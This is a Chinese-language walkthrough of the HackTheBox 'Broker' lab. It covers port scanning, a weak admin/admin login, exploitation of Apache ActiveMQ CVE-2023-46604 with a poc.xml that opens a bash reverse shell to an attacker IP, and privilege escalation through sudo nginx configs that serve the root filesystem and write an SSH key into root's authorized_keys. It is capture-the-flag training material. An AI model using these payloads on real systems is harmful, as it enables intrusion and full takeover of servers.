Broker(HTB)

信息搜集

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- -min-rate 10000 10.10.11.243 -oA test/nmap                                      
[sudo] kali 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 12:12 CST
Nmap scan report for 10.10.11.243 (10.10.11.243)
Host is up (0.074s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
1337/tcp  open  waste
1338/tcp  open  wmc-log-svc
1883/tcp  open  mqtt
5672/tcp  open  amqp
8161/tcp  open  patrol-snmp
44455/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

端口比较多，整理放到变量中，方便后续使用

┌──(kali㉿kali)-[~]
└─$ ports=$(grep open test/nmap.nmap |awk -F '/' '{print $1}'|paste -sd ',')
 
┌──(kali㉿kali)-[~]
└─$ echo $ports
22,80,1337,1338,1883,5672,8161,44455,61613,61614,61616

进一步详细扫描

┌──(kali㉿kali)-[~]
└─$sudo nmap -sT -sV -sC -O -p$ports 10.10.11.243 -oA test/details
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
1337/tcp  open  http       nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: 403 Forbidden
1338/tcp  open  http       nginx 1.18.0 (Ubuntu)
| http-ls: Volume /
|   maxfiles limit reached (10)
| SIZE    TIME               FILENAME
| -       06-Nov-2023 01:10  bin/
| -       06-Nov-2023 01:10  bin/X11/
| 963     17-Feb-2020 14:11  bin/NF
| 129576  27-Oct-2023 11:38  bin/VGAuthService
| 51632   07-Feb-2022 16:03  bin/%5B
| 35344   19-Oct-2022 14:52  bin/aa-enabled
| 35344   19-Oct-2022 14:52  bin/aa-exec
| 31248   19-Oct-2022 14:52  bin/aa-features-abi
| 14478   04-May-2023 11:14  bin/add-apt-repository
| 14712   21-Feb-2022 01:49  bin/addpart
|_
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Index of /
1883/tcp  open  mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp  open  amqp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Error 401 Unauthorized
44455/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15

TCP-80

需要认证

“admin”/“admin“弱密码。登陆 ActiveMQ 的管理界面：

其中显示了ActiveMQ的版本号值得我们留意:”5.15.15”

user-activemq

在X1r0z大神的一篇博客表明：Apache ActiveMQ (版本 < 5.18.3) RCE 分析

在github上可以找到一篇不错的poc:CVE-2023-46604

我将poc克隆到我本地；并且将poc.xml的ip以及端口更改为我的本地ip和后继要nc的端口

┌──(kali㉿kali)-[~/htb/machines/broker/CVE-2023-46604]
└─$ ls -al     
总计 24
drwxr-xr-x 3 kali kali 4096  1月27日 11:51 .
drwxr-xr-x 3 kali kali 4096  1月27日 11:49 ..
-rw-r--r-- 1 kali kali 1828  1月27日 11:49 exploit.py
drwxr-xr-x 8 kali kali 4096  1月27日 11:49 .git
-rw-r--r-- 1 kali kali  666  1月27日 11:51 poc.xml
-rw-r--r-- 1 kali kali 2082  1月27日 11:49 README.md
                                                                                                                     
┌──(kali㉿kali)-[~/htb/machines/broker/CVE-2023-46604]
└─$ cat poc.xml 
<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>bash -i &gt;&amp; /dev/tcp/10.10.16.17/5555 0&gt;&amp;1</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

为了能使目标机可以访问到poc.xml，我在本地开启了nginx服务，并且监听80端口

启动nc

nc -lnnp 5555

使用poc实施RCE

python3 exploit.py -i 10.10.11.243 -p 61616 -u http://10.10.16.17/poc.xml

得到activemq用户的shell

activemq@broker:/home$ id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)

user-root

常规权限检查

activemq@broker:/home$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

activemq用户可以以root权限使用nginx

我可以制作一个恶意的配置文件，user为root;并且使得网站目录为/；这样就可以访问任意文件了

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
    }
}

再用nginx的-c参数指定配置文件

sudo /usr/sbin/nginx -c /home/activemq/shell.config

netstat -ltunp发现端口1337已经在监听状态

┌──(kali㉿kali)-[/var/log/nginx]
└─$ curl http://10.10.11.243:1337/root/root.txt
5f68e0f2578b1608db7db4ffa55bba46

除了文件读取；nginx 还可以处理写入文件的 PUT 请求。我将更新配置以包括启用 PUT

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1338;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}

将我的公共 SSH 密钥写入 root 的authorized_keys文件中

curl -X PUT localhost:1338/root/.ssh/authorized_keys -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing'

接着利用私钥 ssh连接即可